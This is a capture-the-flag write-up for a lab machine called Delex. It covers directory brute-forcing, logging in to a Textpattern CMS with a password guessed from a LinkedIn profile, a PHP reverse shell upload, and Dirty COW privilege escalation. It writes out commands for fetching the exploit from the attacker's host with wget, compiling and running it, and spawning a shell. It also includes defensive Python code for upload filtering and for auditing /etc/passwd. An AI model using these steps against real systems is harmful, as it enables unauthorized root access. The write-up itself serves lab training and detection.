THM-DELEX WRITE-UP

PRIVATE ROOM

https://ehackify.com/

The purpose of Delex is to teach the basics of reconnaissance, CMS exploitation, kernel exploits and privilege escalation. I am sure this machine will take you through all of this.

Table of content

Scanning

nmap

Enumeration

dirb or dirbuster

Exploitation

file upload & netcat

Privilege escalation

dirty cow (kernel exploit)

Scanning

(Discovery tasks, such as determining which ports, services, vulnerabilities and OS details are exposed by the target hosts, or which subdomains and services are accessible for web applications.)

For scanning I use nmap. Nmap is a powerful open-source tool for scanning hosts and networks. It enumerates which ports are open and which services, versions and vulnerabilities are exposed on the host or network.

The scan result shows that port 80 is open, which means a web application is running on the target host. I visited it and a website appeared; its name is Delex.

I snooped around the site and found a LinkedIn icon that redirected to a LinkedIn profile. It belongs to Mayer King, and she had posted two things.

The posts are all about “lionheart”. I felt it might be useful for a further move, so I noted “lionheart” as a candidate username and password. Then I brute-forced the directories using dirb, which lists the directories it finds. There is a directory called “textpattern/textpattern” that holds a login form. I used the username and “lionheart” found from LinkedIn to log in.

Bingo... I got access to it.

I searched about Textpattern and found out that it is a free, open-source content management system based on PHP and MySQL. The interesting thing is that it has a file upload function, through which I can upload a PHP reverse shell.

Using the PHP reverse shell and “nc” I got access to the server.
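From the defender's side, this step works because the CMS accepts a file whose contents the web server will later execute. The following is an added example, not part of this write-up or of Textpattern's own code: a server-side upload check that rejects script files even when they carry an image extension, a double extension, or genuine image magic bytes followed by PHP. The extension list, magic bytes and sample filenames are constructed for illustration.

```python
"""Allowlist-based upload check (added example; not Textpattern code)."""
import os
import re

# Accepted extensions and the magic bytes each file type must start with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Any server-side script extension anywhere in the name is rejected, which
# also catches double extensions such as "shell.php.png".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|py|sh|cgi)(\.|$)", re.IGNORECASE)

# A PHP open tag anywhere in the body is rejected even when the magic bytes
# match, since a polyglot image can still be handed to the PHP interpreter
# by a misconfigured server.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def check_upload(filename, data):
    """Return (accepted, reason) for one uploaded file."""
    name = os.path.basename(filename)  # strips any path traversal in the name
    if SCRIPT_EXT.search(name):
        return False, "script extension in filename"
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not on allowlist"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared type"
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples: a real PNG header, a script, and a polyglot.
    samples = [
        ("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        ("shell.php", b"<?php echo 1; ?>"),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
        ("poly.png", b"\x89PNG\r\n\x1a\n<?php echo 1; ?>"),
    ]
    for fname, body in samples:
        print(fname, check_upload(fname, body))
```

The check is only one layer: uploads should also be stored outside the web root, or in a directory where the server is configured not to execute scripts, so that a file which slips past the filter is served as data rather than run.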

I gained access as a low-privileged user and used a shell spawn to get an interactive shell.

python -c 'import pty; pty.spawn("/bin/bash")'

So my next step is “privilege escalation”. For that I looked at the kernel version, which is “3.2.0-4-amd64”, and I found that it is vulnerable to Dirty COW. I used the pokemon exploit to do that.

exploit:https://www.exploit-db.com/exploits/40839

Upload the exploit file to the victim system in the /tmp directory, because /tmp is writable by every user on the system. I uploaded the file to /tmp using wget, after starting a simple file share with Python on my own machine.

python -m SimpleHTTPServer 8000

Through that I can download the file using wget.

wget http://your_ip:port/40839.c

After downloading I compiled the file using gcc. The exploit source itself explains how to compile and use it.

gcc -pthread 40839.c -o dirty -lcrypt

The file is compiled as dirty; then change the file permission to executable.

chmod +x dirty

After that, execute the file using

./dirty

It will create a new user named firefart and ask for a new password for that user.

This exploit leaves a passwd.bak file at /tmp/passwd.bak.

Exit from the shell, regain access, do the shell spawning again and switch to the new user we created with the exploit.

su firefart

***user_passwd***

Got root!!! It's pwned.
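Seen from the defender's side, this escalation leaves a clear trail: a new UID-0 account, a password hash written straight into /etc/passwd instead of the shadow file, and the backup at /tmp/passwd.bak. The following is an added example, not part of this write-up or of the exploit: a small audit that parses passwd-format text, reports those indicators, and compares the live file with a backup copy when one is present. The sample passwd contents, salt and hash are constructed placeholders, not data from the target.

```python
"""Audit /etc/passwd for the indicators described above (added example)."""
import os

# Constructed sample of a clean passwd file (not from the target machine).
CLEAN_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:alice,,,:/home/alice:/bin/bash\n"
)

# Constructed sample of the same file after a UID-0 account with an inline
# hash has been written into it (salt and hash are placeholders).
TAMPERED_PASSWD = (
    "firefart:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0:pwned:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:alice,,,:/home/alice:/bin/bash\n"
)


def parse_passwd(text):
    """Parse passwd-format text into {username: fields}; malformed lines are skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        if not uid.isdigit() or not gid.isdigit():
            continue
        entries[name] = {"pw": pw, "uid": int(uid), "gid": int(gid),
                         "home": home, "shell": shell}
    return entries


def audit_passwd(text):
    """Return sorted findings: extra UID-0 accounts, missing root, inline hashes."""
    entries = parse_passwd(text)
    findings = []
    if "root" not in entries:
        findings.append("root account missing from passwd")
    for name, e in entries.items():
        if e["uid"] == 0 and name != "root":
            findings.append(f"uid 0 account other than root: {name}")
        # On a shadow-enabled system the second field is a marker, not a hash.
        if e["pw"] not in ("x", "*", "!", ""):
            findings.append(f"password hash stored in passwd rather than shadow: {name}")
    return sorted(findings)


def changed_lines(current_text, backup_text):
    """Lines present in the live file but absent from the backup copy."""
    backup = set(backup_text.splitlines())
    return [ln for ln in current_text.splitlines() if ln and ln not in backup]


def audit_live_system(passwd_path="/etc/passwd", backup_path="/tmp/passwd.bak"):
    """Run the same checks on the real files; backup_path is the one named above."""
    with open(passwd_path) as f:
        current = f.read()
    findings = audit_passwd(current)
    if os.path.exists(backup_path):
        findings.append(f"backup copy of passwd found at {backup_path}")
        with open(backup_path) as f:
            for ln in changed_lines(current, f.read()):
                findings.append(f"line not in backup: {ln}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(TAMPERED_PASSWD):
        print(finding)
    for ln in changed_lines(TAMPERED_PASSWD, CLEAN_PASSWD):
        print("changed:", ln)
```

On the constructed sample the audit reports the inline hash, the missing root entry and the extra UID-0 account, and the backup comparison isolates the one rewritten line. The same checks are cheap enough to run from a file-integrity monitor or a cron job on real hosts.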

And the flags are in the home directories of the users.

cyb3r s3cur1ty g33k 4nd R3s34rch3r